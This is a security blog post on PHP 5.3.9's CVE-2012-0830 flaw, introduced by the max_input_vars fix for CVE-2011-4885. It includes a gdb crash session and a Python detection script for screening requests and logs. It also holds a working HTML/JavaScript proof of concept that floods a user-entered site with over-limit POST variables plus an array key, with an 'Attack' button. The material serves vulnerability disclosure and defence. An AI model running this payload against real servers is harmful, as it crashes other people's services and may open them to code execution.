ClsHack: Computer Security Blog

PHP 5.3.* likes DoS Vulnerabilities


Everything starts from CVE-2011-4885, the PHP Hashtables Denial of Service, whose description says this:

PHP before 5.3.9 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.

The upgrade to PHP 5.3.9 introduced the bug fix:

Added max_input_vars directive to prevent attacks based on hash collisions (Dmitry).

max_input_vars, for example, is configurable via php.ini.

The max_input_vars fix, however, introduces a new bug: CVE-2012-0830

A remote attacker could send large number of crafted POST requests, which could
crash php or execute arbitrary code with the permissions of the user running
php.

cat test.php
<?php
print_r( $_GET );
?>

(gdb) run -d max_input_vars=1 /tmp/test.php a[]=1 v[]=2
Starting program: /usr/bin/php-cgi -d max_input_vars=1 /tmp/test.php a[]=1 v[]=2
[Thread debugging using libthread_db enabled]
PHP Warning: Unknown: Input variables exceeded 1. To increase the limit change max_input_vars in php.ini. in Unknown on line 0
PHP Warning: Unknown: Input variables exceeded 1. To increase the limit change max_input_vars in php.ini. in Unknown on line 0
Program received signal SIGSEGV, Segmentation fault.
0x000000000063cb5e in php_register_variable_ex ()
(gdb) ^CQuit

clshack@lb:~$ php-cgi --version
PHP 5.3.9-6~oneiric+2 (cgi-fcgi) (built: Feb 1 2012 15:51:44)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies
clshack@lb:~$

The vulnerability is as follows:

The vulnerability happens when the number of variables exceeds max_input_vars and the variable is an array variable (if (*p == '[')). Instead of an else case which would stop and return, the code is allowed to continue executing. The code continues to execute up to line 207, the second highlighted line. At line 207, it calls the macro Z_ARRVAL_PP to get a reference to the updated hashtable. This is where the code execution can occur.
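A request-screening and log-detection check for exactly that condition (over the max_input_vars limit and at least one array key), added here as an illustration; it is not code from the original post or from PHP. SAMPLE_BODY and SAMPLE_LOG are constructed inputs, and the warning text matched is the one from the gdb session above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample inputs (not from the original post): a form body whose
# last key is an array variable, and an error log with the warning seen in
# the gdb session above plus one unrelated line.
SAMPLE_BODY = "a=1&b=2&kill[]=kill"
SAMPLE_LOG = [
    "PHP Warning: Unknown: Input variables exceeded 1. To increase the limit change max_input_vars in php.ini. in Unknown on line 0",
    "PHP Notice: Undefined index: foo in /tmp/test.php on line 3",
    "PHP Warning: Unknown: Input variables exceeded 1. To increase the limit change max_input_vars in php.ini. in Unknown on line 0",
]

# Matches PHP 5.3.9's max_input_vars warning and captures the limit in effect.
WARNING_RE = re.compile(r"Input variables exceeded (?P<limit>\d+)\. To increase the limit")


def count_input_vars(body: str) -> tuple[int, bool]:
    """Return (distinct top-level variable names, whether any key is an array key).

    Approximates what PHP counts against max_input_vars: 'kill[]=kill' and
    'kill[x]=1' both land in the one top-level entry 'kill', and a repeated
    plain key overwrites rather than adds.
    """
    names, has_array = set(), False
    for pair in body.split("&"):
        if not pair:
            continue
        key = unquote_plus(pair.split("=", 1)[0])
        if "[" in key:
            has_array = True
        names.add(key.split("[", 1)[0])
    return len(names), has_array


def screen_request(body: str, max_input_vars: int = 1000) -> dict:
    """Classify a form body against the configured max_input_vars.

    'exceeds' is what a fixed PHP rejects with only a warning; 'exceeds_with_array'
    is the over-limit-plus-array-key combination that crashes php_register_variable_ex
    on unpatched 5.3.9, so it is the one to alert on or drop at a proxy.
    """
    n, has_array = count_input_vars(body)
    over = n > max_input_vars
    return {"vars": n, "exceeds": over, "exceeds_with_array": over and has_array}


def limits_from_log(lines) -> list[int]:
    """Extract the limit from every 'Input variables exceeded' warning in a log."""
    return [int(m.group("limit")) for line in lines if (m := WARNING_RE.search(line))]
```

Run screen_request over request bodies at a reverse proxy with the same max_input_vars as the PHP backend, and feed limits_from_log the PHP error log to confirm the limit actually in force on a host.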

And here is the PoC against a remote site, with max_input_vars set to 1000 [edit by clshack v.v]:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
	<title>senza nome</title>
	<meta http-equiv="content-type" content="text/html;charset=utf-8" />
	<script>

		// Simple proof of concept for PHP bug (CVE-2012-0830) described by Stefan Esser (@i0n1c)
		// http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
		// Generate 1000 normal keys and one array
		function createEvilObj () {
			var evil_obj = {};
			for (var i = 0; i < 1001; i++) {
				evil_obj[i] = 1;
			}
			evil_obj['kill[]'] = 'kill';
			return evil_obj;
		}
		// Serialize Javascript object into POST data
		function serializeObj (obj) {
			var str = [];
			for (var p in obj) {
				str.push(p + "=" + obj[p]);
			}
			return str.join("&");
		}
		// Run attack
		function attackSite (site)
		{
			var bad = serializeObj(createEvilObj());
			var xhr = new XMLHttpRequest();
			xhr.open("POST", site, true);
			xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
			xhr.setRequestHeader('Content-Length', bad.length);
			xhr.send(bad);
		}
	</script>
</head>

<body>
	<input type='text' id='site' value='http://www.example.com' name='site' >
	<button onclick='attackSite(document.getElementById("site").value);'> Attack</button>
</body>
</html>

The PoC for CVE-2011-4885 is available here:
http://www.exploit-db.com/exploits/18296/
There is also, for PHP 5.4SVN-2012-02-03, a buffer overflow in the htmlspecialchars / htmlentities functions.
PoC:
http://www.exploit-db.com/exploits/18458/

References:

http://pastebin.com/qWBrq0A3

http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/

http://www.exploit-db.com

This entry was posted on Friday, February 3rd, 2012 at 4:07 pm and is filed under Hacking, Programming.